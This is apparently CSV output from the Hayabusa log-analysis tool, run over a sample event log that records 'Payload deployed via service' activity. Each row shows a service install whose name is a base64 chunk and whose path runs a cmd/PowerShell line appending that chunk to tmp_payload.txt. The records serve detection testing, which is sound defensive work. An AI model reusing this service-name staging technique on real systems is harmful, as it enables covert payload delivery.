+00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:28.059 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:28.059 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:28.059 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:29.523 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:29.523 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:29.523 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:30.978 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:30.978 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:30.978 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:32.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:32.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:32.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:33.911 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:33.911 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:33.911 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:35.365 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:35.365 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:35.365 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:36.820 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:36.820 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:36.820 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:38.273 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:38.273 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:38.273 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:39.711 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:39.711 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:39.711 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:41.177 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:41.177 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:41.177 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:42.631 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:42.631 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:42.631 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:44.099 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:44.099 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:44.099 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
